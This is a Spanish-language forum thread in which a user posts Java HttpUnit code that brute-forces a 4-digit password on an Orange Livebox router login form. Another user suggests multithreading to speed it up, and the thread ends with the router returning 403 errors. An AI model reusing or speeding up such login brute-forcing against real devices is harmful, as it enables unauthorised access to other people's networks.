Autor
|
Tema: Bot para iterar contraseñas en un rango de 4 digitos (Leído 3,529 veces)
|
sergiorey
|
Hola, soy nuevo en el foro. Necesito un programa/script/bot o como quieras llamarlo para que itere 10000 veces para acceder al livebox del router(orange). El usuario no hace falta, y el password se que es de 4 dígitos. Estaria eternamente agradecido si alguien me echa un cable. Se programacion en java pero no se como vincularlo con html. No importa si es en otro lenguaje.
Acabo de hacer un pequeño programa muy cutre en java usando HttpUnit y parece que funciona, aunque el problema es que itera bastante lento, es decir por segundo. Empiezo por 1000 por que no me quiero comer la cabeza Darme alguna opinion al respecto, gracias. public class Prueva { WebConversation wc = new WebConversation(); WebResponse resp = wc.getResponse( "http://192.168.1.1" ); // read this page String url = "http://192.168.1.1/loginpserr.stm"; WebForm form = resp.getForms()[1]; // select the second form in the page for (int i = 1000; i < 10000; i++) { form. setParameter("pws", String. valueOf(i )); form.submit(); if(!url.toString().equals(wc.getCurrentPage().getURL().toString())){ System. out. println(i + " es la clave correcta!!!! ENHORABUENA!"); break; } } } }
· No hagas doble post >aquí las reglas del foro -Engel Lex
|
|
« Última modificación: 22 Marzo 2017, 01:43 am por sergiorey »
|
|
|
|
|
engel lex
|
usa multihilo, tirás tanto threads como soporte el pobre aparato y harás el procesos cientos de veces más rapido
|
|
|
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
sergiorey
|
Tienes razón, gracias y perdón por la novatada Vale, se me ha quedado en 1890 y ahora me lanza este error Error on HTTP request: 403 Forbidden [http://192.168.1.1]
|
|
« Última modificación: 22 Marzo 2017, 01:47 am por sergiorey »
|
|
|
|
|
engel lex
|
te bloqueó XD forbidden = prohibido... probablemente tiene alguna detección de intentos... o simplemente fueron tantos que se bloqueó el servidor interno
|
|
|
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
sergiorey
|
te bloqueó XD forbidden = prohibido... probablemente tiene alguna detección de intentos... o simplemente fueron tantos que se bloqueó el servidor interno
Parece ser eso, aunque desde el navegador web en teoria me deja
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Diccionario de 20 Dígitos Aleatorio para WLAN_XXXX
« 1 2 3 »
Wireless en Linux
|
El_Andaluz
|
24
|
32,912
|
3 Diciembre 2015, 21:08 pm
por robermgs
|
|
|
Por ayuden con los dígitos para desbloquear mi cell es ett pantech
Dispositivos Móviles (PDA's, Smartphones, Tablets)
|
Jorge1987
|
1
|
2,372
|
28 Julio 2014, 14:20 pm
por Shell Root
|
|
|